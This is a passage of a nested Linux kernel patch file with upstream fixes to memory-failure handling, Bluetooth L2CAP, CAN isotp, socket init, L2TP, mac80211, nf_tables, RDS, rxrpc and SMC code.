+-	enum ttu_flags ttu = TTU_IGNORE_MLOCK | TTU_SYNC;
++	enum ttu_flags ttu = TTU_IGNORE_MLOCK | TTU_SYNC | TTU_HWPOISON;
+ 	struct address_space *mapping;
+ 	LIST_HEAD(tokill);
+ 	bool unmap_success;
+@@ -1445,7 +1445,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 
+ 	if (PageSwapCache(p)) {
+ 		pr_err("%#lx: keeping poisoned page in swap cache\n", pfn);
+-		ttu |= TTU_IGNORE_HWPOISON;
++		ttu &= ~TTU_HWPOISON;
+ 	}
+ 
+ 	/*
+@@ -1460,7 +1460,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 		if (page_mkclean(hpage)) {
+ 			SetPageDirty(hpage);
+ 		} else {
+-			ttu |= TTU_IGNORE_HWPOISON;
++			ttu &= ~TTU_HWPOISON;
+ 			pr_info("%#lx: corrupted page was clean: dropped without side effects\n",
+ 				pfn);
+ 		}
+diff --git a/mm/memory-tiers.c b/mm/memory-tiers.c
+index c734658c62424..e593e56e530b7 100644
+--- a/mm/memory-tiers.c
++++ b/mm/memory-tiers.c
+@@ -211,8 +211,8 @@ static struct memory_tier *find_create_memory_tier(struct memory_dev_type *memty
+ 
+ 	ret = device_register(&new_memtier->dev);
+ 	if (ret) {
+-		list_del(&memtier->list);
+-		put_device(&memtier->dev);
++		list_del(&new_memtier->list);
++		put_device(&new_memtier->dev);
+ 		return ERR_PTR(ret);
+ 	}
+ 	memtier = new_memtier;
+diff --git a/mm/rmap.c b/mm/rmap.c
+index b616870a09be8..3b45d049069e2 100644
+--- a/mm/rmap.c
++++ b/mm/rmap.c
+@@ -1615,7 +1615,7 @@ static bool try_to_unmap_one(struct folio *folio, struct vm_area_struct *vma,
+ 		/* Update high watermark before we lower rss */
+ 		update_hiwater_rss(mm);
+ 
+-		if (PageHWPoison(subpage) && !(flags & TTU_IGNORE_HWPOISON)) {
++		if (PageHWPoison(subpage) && (flags & TTU_HWPOISON)) {
+ 			pteval = swp_entry_to_pte(make_hwpoison_entry(subpage));
+ 			if (folio_test_hugetlb(folio)) {
+ 				hugetlb_count_sub(folio_nr_pages(folio), mm);
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index acf563fbdfd95..61a34801e61ea 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -1981,16 +1981,14 @@ static void hci_iso_qos_setup(struct hci_dev *hdev, struct hci_conn *conn,
+ 		qos->latency = conn->le_conn_latency;
+ }
+ 
+-static struct hci_conn *hci_bind_bis(struct hci_conn *conn,
+-				     struct bt_iso_qos *qos)
++static void hci_bind_bis(struct hci_conn *conn,
++			 struct bt_iso_qos *qos)
+ {
+ 	/* Update LINK PHYs according to QoS preference */
+ 	conn->le_tx_phy = qos->out.phy;
+ 	conn->le_tx_phy = qos->out.phy;
+ 	conn->iso_qos = *qos;
+ 	conn->state = BT_BOUND;
+-
+-	return conn;
+ }
+ 
+ static int create_big_sync(struct hci_dev *hdev, void *data)
+@@ -2119,11 +2117,7 @@ struct hci_conn *hci_connect_bis(struct hci_dev *hdev, bdaddr_t *dst,
+ 	if (IS_ERR(conn))
+ 		return conn;
+ 
+-	conn = hci_bind_bis(conn, qos);
+-	if (!conn) {
+-		hci_conn_drop(conn);
+-		return ERR_PTR(-ENOMEM);
+-	}
++	hci_bind_bis(conn, qos);
+ 
+ 	/* Add Basic Announcement into Peridic Adv Data if BASE is set */
+ 	if (base_len && base) {
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index a3e0dc6a6e732..adfc3ea06d088 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -2683,14 +2683,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		if (IS_ERR(skb))
+ 			return PTR_ERR(skb);
+ 
+-		/* Channel lock is released before requesting new skb and then
+-		 * reacquired thus we need to recheck channel state.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			kfree_skb(skb);
+-			return -ENOTCONN;
+-		}
+-
+ 		l2cap_do_send(chan, skb);
+ 		return len;
+ 	}
+@@ -2735,14 +2727,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		if (IS_ERR(skb))
+ 			return PTR_ERR(skb);
+ 
+-		/* Channel lock is released before requesting new skb and then
+-		 * reacquired thus we need to recheck channel state.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			kfree_skb(skb);
+-			return -ENOTCONN;
+-		}
+-
+ 		l2cap_do_send(chan, skb);
+ 		err = len;
+ 		break;
+@@ -2763,14 +2747,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		 */
+ 		err = l2cap_segment_sdu(chan, &seg_queue, msg, len);
+ 
+-		/* The channel could have been closed while segmenting,
+-		 * check that it is still connected.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			__skb_queue_purge(&seg_queue);
+-			err = -ENOTCONN;
+-		}
+-
+ 		if (err)
+ 			break;
+ 
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index ca8f07f3542b8..eebe256104bc0 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -1624,6 +1624,14 @@ static struct sk_buff *l2cap_sock_alloc_skb_cb(struct l2cap_chan *chan,
+ 	if (!skb)
+ 		return ERR_PTR(err);
+ 
++	/* Channel lock is released before requesting new skb and then
++	 * reacquired thus we need to recheck channel state.
++	 */
++	if (chan->state != BT_CONNECTED) {
++		kfree_skb(skb);
++		return ERR_PTR(-ENOTCONN);
++	}
++
+ 	skb->priority = sk->sk_priority;
+ 
+ 	bt_cb(skb)->l2cap.chan = chan;
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index fc81d77724a13..9bc344851704e 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -1220,6 +1220,9 @@ static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 	if (len < ISOTP_MIN_NAMELEN)
+ 		return -EINVAL;
+ 
++	if (addr->can_family != AF_CAN)
++		return -EINVAL;
++
+ 	/* sanitize tx CAN identifier */
+ 	if (tx_id & CAN_EFF_FLAG)
+ 		tx_id &= (CAN_EFF_FLAG | CAN_EFF_MASK);
+diff --git a/net/core/scm.c b/net/core/scm.c
+index 5c356f0dee30c..acb7d776fa6ec 100644
+--- a/net/core/scm.c
++++ b/net/core/scm.c
+@@ -229,6 +229,8 @@ int put_cmsg(struct msghdr * msg, int level, int type, int len, void *data)
+ 	if (msg->msg_control_is_user) {
+ 		struct cmsghdr __user *cm = msg->msg_control_user;
+ 
++		check_object_size(data, cmlen - sizeof(*cm), true);
++
+ 		if (!user_write_access_begin(cm, cmlen))
+ 			goto efault;
+ 
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 6f27c24016fee..63680f999bf6d 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -3381,7 +3381,7 @@ void sk_stop_timer_sync(struct sock *sk, struct timer_list *timer)
+ }
+ EXPORT_SYMBOL(sk_stop_timer_sync);
+ 
+-void sock_init_data(struct socket *sock, struct sock *sk)
++void sock_init_data_uid(struct socket *sock, struct sock *sk, kuid_t uid)
+ {
+ 	sk_init_common(sk);
+ 	sk->sk_send_head	=	NULL;
+@@ -3401,11 +3401,10 @@ void sock_init_data(struct socket *sock, struct sock *sk)
+ 		sk->sk_type	=	sock->type;
+ 		RCU_INIT_POINTER(sk->sk_wq, &sock->wq);
+ 		sock->sk	=	sk;
+-		sk->sk_uid	=	SOCK_INODE(sock)->i_uid;
+ 	} else {
+ 		RCU_INIT_POINTER(sk->sk_wq, NULL);
+-		sk->sk_uid	=	make_kuid(sock_net(sk)->user_ns, 0);
+ 	}
++	sk->sk_uid	=	uid;
+ 
+ 	rwlock_init(&sk->sk_callback_lock);
+ 	if (sk->sk_kern_sock)
+@@ -3463,6 +3462,16 @@ void sock_init_data(struct socket *sock, struct sock *sk)
+ 	refcount_set(&sk->sk_refcnt, 1);
+ 	atomic_set(&sk->sk_drops, 0);
+ }
++EXPORT_SYMBOL(sock_init_data_uid);
++
++void sock_init_data(struct socket *sock, struct sock *sk)
++{
++	kuid_t uid = sock ?
++		SOCK_INODE(sock)->i_uid :
++		make_kuid(sock_net(sk)->user_ns, 0);
++
++	sock_init_data_uid(sock, sk, uid);
++}
+ EXPORT_SYMBOL(sock_init_data);
+ 
+ void lock_sock_nested(struct sock *sk, int subclass)
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index f58d73888638b..7a13dd7f546b6 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -1008,17 +1008,7 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row,
+ 	u32 index;
+ 
+ 	if (port) {
+-		head = &hinfo->bhash[inet_bhashfn(net, port,
+-						  hinfo->bhash_size)];
+-		tb = inet_csk(sk)->icsk_bind_hash;
+-		spin_lock_bh(&head->lock);
+-		if (sk_head(&tb->owners) == sk && !sk->sk_bind_node.next) {
+-			inet_ehash_nolisten(sk, NULL, NULL);
+-			spin_unlock_bh(&head->lock);
+-			return 0;
+-		}
+-		spin_unlock(&head->lock);
+-		/* No definite answer... Walk to established hash table */
++		local_bh_disable();
+ 		ret = check_established(death_row, sk, port, NULL);
+ 		local_bh_enable();
+ 		return ret;
+diff --git a/net/l2tp/l2tp_ppp.c b/net/l2tp/l2tp_ppp.c
+index db2e584c625e5..f011af6601c9c 100644
+--- a/net/l2tp/l2tp_ppp.c
++++ b/net/l2tp/l2tp_ppp.c
+@@ -650,54 +650,22 @@ static int pppol2tp_tunnel_mtu(const struct l2tp_tunnel *tunnel)
+ 	return mtu - PPPOL2TP_HEADER_OVERHEAD;
+ }
+ 
+-/* connect() handler. Attach a PPPoX socket to a tunnel UDP socket
+- */
+-static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
+-			    int sockaddr_len, int flags)
++static struct l2tp_tunnel *pppol2tp_tunnel_get(struct net *net,
++					       const struct l2tp_connect_info *info,
++					       bool *new_tunnel)
+ {
+-	struct sock *sk = sock->sk;
+-	struct pppox_sock *po = pppox_sk(sk);
+-	struct l2tp_session *session = NULL;
+-	struct l2tp_connect_info info;
+ 	struct l2tp_tunnel *tunnel;
+-	struct pppol2tp_session *ps;
+-	struct l2tp_session_cfg cfg = { 0, };
+-	bool drop_refcnt = false;
+-	bool drop_tunnel = false;
+-	bool new_session = false;
+-	bool new_tunnel = false;
+ 	int error;
+ 
+-	error = pppol2tp_sockaddr_get_info(uservaddr, sockaddr_len, &info);
+-	if (error < 0)
+-		return error;
++	*new_tunnel = false;
+ 
+-	lock_sock(sk);
+-
+-	/* Check for already bound sockets */
+-	error = -EBUSY;
+-	if (sk->sk_state & PPPOX_CONNECTED)
+-		goto end;
+-
+-	/* We don't supporting rebinding anyway */
+-	error = -EALREADY;
+-	if (sk->sk_user_data)
+-		goto end; /* socket is already attached */
+-
+-	/* Don't bind if tunnel_id is 0 */
+-	error = -EINVAL;
+-	if (!info.tunnel_id)
+-		goto end;
+-
+-	tunnel = l2tp_tunnel_get(sock_net(sk), info.tunnel_id);
+-	if (tunnel)
+-		drop_tunnel = true;
++	tunnel = l2tp_tunnel_get(net, info->tunnel_id);
+ 
+ 	/* Special case: create tunnel context if session_id and
+ 	 * peer_session_id is 0. Otherwise look up tunnel using supplied
+ 	 * tunnel id.
+ 	 */
+-	if (!info.session_id && !info.peer_session_id) {
++	if (!info->session_id && !info->peer_session_id) {
+ 		if (!tunnel) {
+ 			struct l2tp_tunnel_cfg tcfg = {
+ 				.encap = L2TP_ENCAPTYPE_UDP,
+@@ -706,40 +674,82 @@ static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
+ 			/* Prevent l2tp_tunnel_register() from trying to set up
+ 			 * a kernel socket.
+ 			 */
+-			if (info.fd < 0) {
+-				error = -EBADF;
+-				goto end;
+-			}
++			if (info->fd < 0)
++				return ERR_PTR(-EBADF);
+ 
+-			error = l2tp_tunnel_create(info.fd,
+-						   info.version,
+-						   info.tunnel_id,
+-						   info.peer_tunnel_id, &tcfg,
++			error = l2tp_tunnel_create(info->fd,
++						   info->version,
++						   info->tunnel_id,
++						   info->peer_tunnel_id, &tcfg,
+ 						   &tunnel);
+ 			if (error < 0)
+-				goto end;
++				return ERR_PTR(error);
+ 
+ 			l2tp_tunnel_inc_refcount(tunnel);
+-			error = l2tp_tunnel_register(tunnel, sock_net(sk),
+-						     &tcfg);
++			error = l2tp_tunnel_register(tunnel, net, &tcfg);
+ 			if (error < 0) {
+ 				kfree(tunnel);
+-				goto end;
++				return ERR_PTR(error);
+ 			}
+-			drop_tunnel = true;
+-			new_tunnel = true;
++
++			*new_tunnel = true;
+ 		}
+ 	} else {
+ 		/* Error if we can't find the tunnel */
+-		error = -ENOENT;
+ 		if (!tunnel)
+-			goto end;
++			return ERR_PTR(-ENOENT);
+ 
+ 		/* Error if socket is not prepped */
+-		if (!tunnel->sock)
+-			goto end;
++		if (!tunnel->sock) {
++			l2tp_tunnel_dec_refcount(tunnel);
++			return ERR_PTR(-ENOENT);
++		}
+ 	}
+ 
++	return tunnel;
++}
++
++/* connect() handler. Attach a PPPoX socket to a tunnel UDP socket
++ */
++static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
++			    int sockaddr_len, int flags)
++{
++	struct sock *sk = sock->sk;
++	struct pppox_sock *po = pppox_sk(sk);
++	struct l2tp_session *session = NULL;
++	struct l2tp_connect_info info;
++	struct l2tp_tunnel *tunnel;
++	struct pppol2tp_session *ps;
++	struct l2tp_session_cfg cfg = { 0, };
++	bool drop_refcnt = false;
++	bool new_session = false;
++	bool new_tunnel = false;
++	int error;
++
++	error = pppol2tp_sockaddr_get_info(uservaddr, sockaddr_len, &info);
++	if (error < 0)
++		return error;
++
++	/* Don't bind if tunnel_id is 0 */
++	if (!info.tunnel_id)
++		return -EINVAL;
++
++	tunnel = pppol2tp_tunnel_get(sock_net(sk), &info, &new_tunnel);
++	if (IS_ERR(tunnel))
++		return PTR_ERR(tunnel);
++
++	lock_sock(sk);
++
++	/* Check for already bound sockets */
++	error = -EBUSY;
++	if (sk->sk_state & PPPOX_CONNECTED)
++		goto end;
++
++	/* We don't supporting rebinding anyway */
++	error = -EALREADY;
++	if (sk->sk_user_data)
++		goto end; /* socket is already attached */
++
+ 	if (tunnel->peer_tunnel_id == 0)
+ 		tunnel->peer_tunnel_id = info.peer_tunnel_id;
+ 
+@@ -840,8 +850,7 @@ end:
+ 	}
+ 	if (drop_refcnt)
+ 		l2tp_session_dec_refcount(session);
+-	if (drop_tunnel)
+-		l2tp_tunnel_dec_refcount(tunnel);
++	l2tp_tunnel_dec_refcount(tunnel);
+ 	release_sock(sk);
+ 
+ 	return error;
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 672eff6f5d328..d611e15301839 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -4622,6 +4622,20 @@ unlock:
+ 	sdata_unlock(sdata);
+ }
+ 
++void ieee80211_color_collision_detection_work(struct work_struct *work)
++{
++	struct delayed_work *delayed_work = to_delayed_work(work);
++	struct ieee80211_link_data *link =
++		container_of(delayed_work, struct ieee80211_link_data,
++			     color_collision_detect_work);
++	struct ieee80211_sub_if_data *sdata = link->sdata;
++
++	sdata_lock(sdata);
++	cfg80211_obss_color_collision_notify(sdata->dev, link->color_bitmap,
++					     GFP_KERNEL);
++	sdata_unlock(sdata);
++}
++
+ void ieee80211_color_change_finish(struct ieee80211_vif *vif)
+ {
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(vif);
+@@ -4636,11 +4650,21 @@ ieeee80211_obss_color_collision_notify(struct ieee80211_vif *vif,
+ 				       u64 color_bitmap, gfp_t gfp)
+ {
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(vif);
++	struct ieee80211_link_data *link = &sdata->deflink;
+ 
+ 	if (sdata->vif.bss_conf.color_change_active || sdata->vif.bss_conf.csa_active)
+ 		return;
+ 
+-	cfg80211_obss_color_collision_notify(sdata->dev, color_bitmap, gfp);
++	if (delayed_work_pending(&link->color_collision_detect_work))
++		return;
++
++	link->color_bitmap = color_bitmap;
++	/* queue the color collision detection event every 500 ms in order to
++	 * avoid sending too much netlink messages to userspace.
++	 */
++	ieee80211_queue_delayed_work(&sdata->local->hw,
++				     &link->color_collision_detect_work,
++				     msecs_to_jiffies(500));
+ }
+ EXPORT_SYMBOL_GPL(ieeee80211_obss_color_collision_notify);
+ 
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index d16606e84e22d..7ca9bde3c6d25 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -974,6 +974,8 @@ struct ieee80211_link_data {
+ 	struct cfg80211_chan_def csa_chandef;
+ 
+ 	struct work_struct color_change_finalize_work;
++	struct delayed_work color_collision_detect_work;
++	u64 color_bitmap;
+ 
+ 	/* context reservation -- protected with chanctx_mtx */
+ 	struct ieee80211_chanctx *reserved_chanctx;
+@@ -1929,6 +1931,7 @@ int ieee80211_channel_switch(struct wiphy *wiphy, struct net_device *dev,
+ 
+ /* color change handling */
+ void ieee80211_color_change_finalize_work(struct work_struct *work);
++void ieee80211_color_collision_detection_work(struct work_struct *work);
+ 
+ /* interface handling */
+ #define MAC80211_SUPPORTED_FEATURES_TX	(NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM | \
+diff --git a/net/mac80211/link.c b/net/mac80211/link.c
+index d1f5a9f7c6470..8c8869cc1fb4c 100644
+--- a/net/mac80211/link.c
++++ b/net/mac80211/link.c
+@@ -39,6 +39,8 @@ void ieee80211_link_init(struct ieee80211_sub_if_data *sdata,
+ 		  ieee80211_csa_finalize_work);
+ 	INIT_WORK(&link->color_change_finalize_work,
+ 		  ieee80211_color_change_finalize_work);
++	INIT_DELAYED_WORK(&link->color_collision_detect_work,
++			  ieee80211_color_collision_detection_work);
+ 	INIT_LIST_HEAD(&link->assigned_chanctx_list);
+ 	INIT_LIST_HEAD(&link->reserved_chanctx_list);
+ 	INIT_DELAYED_WORK(&link->dfs_cac_timer_work,
+@@ -66,6 +68,7 @@ void ieee80211_link_stop(struct ieee80211_link_data *link)
+ 	if (link->sdata->vif.type == NL80211_IFTYPE_STATION)
+ 		ieee80211_mgd_stop_link(link);
+ 
++	cancel_delayed_work_sync(&link->color_collision_detect_work);
+ 	ieee80211_link_release_channel(link);
+ }
+ 
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index c6562a6d25035..1ed345d072b3f 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -4052,9 +4052,6 @@ static void ieee80211_invoke_rx_handlers(struct ieee80211_rx_data *rx)
+ static bool
+ ieee80211_rx_is_valid_sta_link_id(struct ieee80211_sta *sta, u8 link_id)
+ {
+-	if (!sta->mlo)
+-		return false;
+-
+ 	return !!(sta->valid_links & BIT(link_id));
+ }
+ 
+@@ -4076,13 +4073,8 @@ static bool ieee80211_rx_data_set_link(struct ieee80211_rx_data *rx,
+ }
+ 
+ static bool ieee80211_rx_data_set_sta(struct ieee80211_rx_data *rx,
+-				      struct ieee80211_sta *pubsta,
+-				      int link_id)
++				      struct sta_info *sta, int link_id)
+ {
+-	struct sta_info *sta;
+-
+-	sta = container_of(pubsta, struct sta_info, sta);
+-
+ 	rx->link_id = link_id;
+ 	rx->sta = sta;
+ 
+@@ -4120,7 +4112,7 @@ void ieee80211_release_reorder_timeout(struct sta_info *sta, int tid)
+ 	if (sta->sta.valid_links)
+ 		link_id = ffs(sta->sta.valid_links) - 1;
+ 
+-	if (!ieee80211_rx_data_set_sta(&rx, &sta->sta, link_id))
++	if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 		return;
+ 
+ 	tid_agg_rx = rcu_dereference(sta->ampdu_mlme.tid_rx[tid]);
+@@ -4166,7 +4158,7 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 
+ 	sta = container_of(pubsta, struct sta_info, sta);
+ 
+-	if (!ieee80211_rx_data_set_sta(&rx, pubsta, -1))
++	if (!ieee80211_rx_data_set_sta(&rx, sta, -1))
+ 		return;
+ 
+ 	rcu_read_lock();
+@@ -4843,7 +4835,8 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 		hdr = (struct ieee80211_hdr *)rx->skb->data;
+ 	}
+ 
+-	if (unlikely(rx->sta && rx->sta->sta.mlo)) {
++	if (unlikely(rx->sta && rx->sta->sta.mlo) &&
++	    is_unicast_ether_addr(hdr->addr1)) {
+ 		/* translate to MLD addresses */
+ 		if (ether_addr_equal(link->conf->addr, hdr->addr1))
+ 			ether_addr_copy(hdr->addr1, rx->sdata->vif.addr);
+@@ -4873,6 +4866,7 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+ 	struct ieee80211_fast_rx *fast_rx;
+ 	struct ieee80211_rx_data rx;
++	struct sta_info *sta;
+ 	int link_id = -1;
+ 
+ 	memset(&rx, 0, sizeof(rx));
+@@ -4900,7 +4894,8 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	 * link_id is used only for stats purpose and updating the stats on
+ 	 * the deflink is fine?
+ 	 */
+-	if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
++	sta = container_of(pubsta, struct sta_info, sta);
++	if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 		goto drop;
+ 
+ 	fast_rx = rcu_dereference(rx.sta->fast_rx);
+@@ -4940,7 +4935,7 @@ static bool ieee80211_rx_for_interface(struct ieee80211_rx_data *rx,
+ 			link_id = status->link_id;
+ 	}
+ 
+-	if (!ieee80211_rx_data_set_sta(rx, &sta->sta, link_id))
++	if (!ieee80211_rx_data_set_sta(rx, sta, link_id))
+ 		return false;
+ 
+ 	return ieee80211_prepare_and_rx_handle(rx, skb, consume);
+@@ -5007,7 +5002,8 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 			link_id = status->link_id;
+ 
+ 		if (pubsta) {
+-			if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
++			sta = container_of(pubsta, struct sta_info, sta);
++			if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 				goto out;
+ 
+ 			/*
+@@ -5044,8 +5040,7 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 			}
+ 
+ 			rx.sdata = prev_sta->sdata;
+-			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
+-						       link_id))
++			if (!ieee80211_rx_data_set_sta(&rx, prev_sta, link_id))
+ 				goto out;
+ 
+ 			if (!status->link_valid && prev_sta->sta.mlo)
+@@ -5058,8 +5053,7 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 
+ 		if (prev_sta) {
+ 			rx.sdata = prev_sta->sdata;
+-			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
+-						       link_id))
++			if (!ieee80211_rx_data_set_sta(&rx, prev_sta, link_id))
+ 				goto out;
+ 
+ 			if (!status->link_valid && prev_sta->sta.mlo)
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index 04e0f132b1d9c..34cb833db25f5 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -2411,7 +2411,7 @@ static void sta_stats_decode_rate(struct ieee80211_local *local, u32 rate,
+ 
+ static int sta_set_rate_info_rx(struct sta_info *sta, struct rate_info *rinfo)
+ {
+-	u16 rate = READ_ONCE(sta_get_last_rx_stats(sta)->last_rate);
++	u32 rate = READ_ONCE(sta_get_last_rx_stats(sta)->last_rate);
+ 
+ 	if (rate == STA_STATS_RATE_INVALID)
+ 		return -EINVAL;
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index defe97a31724d..7699fb4106701 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -4434,7 +4434,7 @@ static void ieee80211_mlo_multicast_tx(struct net_device *dev,
+ 	u32 ctrl_flags = IEEE80211_TX_CTRL_MCAST_MLO_FIRST_TX;
+ 
+ 	if (hweight16(links) == 1) {
+-		ctrl_flags |= u32_encode_bits(ffs(links) - 1,
++		ctrl_flags |= u32_encode_bits(__ffs(links),
+ 					      IEEE80211_TX_CTRL_MLO_LINK);
+ 
+ 		__ieee80211_subif_start_xmit(skb, sdata->dev, 0, ctrl_flags,
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 8c09e4d12ac1e..fc8256b00b320 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -6999,6 +6999,9 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return -EOPNOTSUPP;
+ 
+ 		type = __nft_obj_type_get(objtype);
++		if (WARN_ON_ONCE(!type))
++			return -ENOENT;
++
+ 		nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
+ 		return nf_tables_updobj(&ctx, type, nla[NFTA_OBJ_DATA], obj);
+diff --git a/net/rds/message.c b/net/rds/message.c
+index c19c935612278..7af59d2443e5d 100644
+--- a/net/rds/message.c
++++ b/net/rds/message.c
+@@ -118,7 +118,7 @@ static void rds_rm_zerocopy_callback(struct rds_sock *rs,
+ 	ck = &info->zcookies;
+ 	memset(ck, 0, sizeof(*ck));
+ 	WARN_ON(!rds_zcookie_add(info, cookie));
+-	list_add_tail(&q->zcookie_head, &info->rs_zcookie_next);
++	list_add_tail(&info->rs_zcookie_next, &q->zcookie_head);
+ 
+ 	spin_unlock_irqrestore(&q->lock, flags);
+ 	/* caller invokes rds_wake_sk_sleep() */
+diff --git a/net/rxrpc/call_object.c b/net/rxrpc/call_object.c
+index f3c9f0201c156..7ce562f6dc8d5 100644
+--- a/net/rxrpc/call_object.c
++++ b/net/rxrpc/call_object.c
+@@ -54,12 +54,14 @@ void rxrpc_poke_call(struct rxrpc_call *call, enum rxrpc_call_poke_trace what)
+ 		spin_lock_bh(&local->lock);
+ 		busy = !list_empty(&call->attend_link);
+ 		trace_rxrpc_poke_call(call, busy, what);
++		if (!busy && !rxrpc_try_get_call(call, rxrpc_call_get_poke))
++			busy = true;
+ 		if (!busy) {
+-			rxrpc_get_call(call, rxrpc_call_get_poke);
+ 			list_add_tail(&call->attend_link, &local->call_attend_q);
+ 		}
+ 		spin_unlock_bh(&local->lock);
+-		rxrpc_wake_up_io_thread(local);
++		if (!busy)
++			rxrpc_wake_up_io_thread(local);
+ 	}
+ }
+ 
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index e12d4fa5aece6..d9413d43b1045 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -1826,8 +1826,10 @@ static int smcr_serv_conf_first_link(struct smc_sock *smc)
+ 	smc_llc_link_active(link);
+ 	smcr_lgr_set_type(link->lgr, SMC_LGR_SINGLE);
+ 
++	mutex_lock(&link->lgr->llc_conf_mutex);
+ 	/* initial contact - try to establish second link */
+ 	smc_llc_srv_add_link(link, NULL);
++	mutex_unlock(&link->lgr->llc_conf_mutex);
+ 	return 0;
+ }
+ 
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index c305d8dd23f80..c19d4b7c1f28a 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1120,8 +1120,9 @@ static void smcr_buf_unuse(struct smc_buf_desc *buf_desc, bool is_rmb,
+ 
+ 		smc_buf_free(lgr, is_rmb, buf_desc);
+ 	} else {
+-		buf_desc->used = 0;
+-		memset(buf_desc->cpu_addr, 0, buf_desc->len);
++		/* memzero_explicit provides potential memory barrier semantics */
++		memzero_explicit(buf_desc->cpu_addr, buf_desc->len);
++		WRITE_ONCE(buf_desc->used, 0);
+ 	}
+ }
+ 
+@@ -1132,19 +1133,17 @@ static void smc_buf_unuse(struct smc_connection *conn,
+ 		if (!lgr->is_smcd && conn->sndbuf_desc->is_vm) {
+ 			smcr_buf_unuse(conn->sndbuf_desc, false, lgr);
+ 		} else {
+-			conn->sndbuf_desc->used = 0;
+-			memset(conn->sndbuf_desc->cpu_addr, 0,
+-			       conn->sndbuf_desc->len);
++			memzero_explicit(conn->sndbuf_desc->cpu_addr, conn->sndbuf_desc->len);
++			WRITE_ONCE(conn->sndbuf_desc->used, 0);
+ 		}
+ 	}
+ 	if (conn->rmb_desc) {
+ 		if (!lgr->is_smcd) {
+ 			smcr_buf_unuse(conn->rmb_desc, true, lgr);
+ 		} else {
+-			conn->rmb_desc->used = 0;
+-			memset(conn->rmb_desc->cpu_addr, 0,
+-			       conn->rmb_desc->len +
+-			       sizeof(struct smcd_cdc_msg));
++			memzero_explicit(conn->rmb_desc->cpu_addr,
++					 conn->rmb_desc->len + sizeof(struct smcd_cdc_msg));
++			WRITE_ONCE(conn->rmb_desc->used, 0);
+ 		}
+ 	}
+ }
+diff --git a/net/socket.c b/net/socket.c
+index c12af3c84d3a6..b4cdc576afc3f 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -449,7 +449,9 @@ static struct file_system_type sock_fs_type = {
+  *
+  *	Returns the &file bound with @sock, implicitly storing it
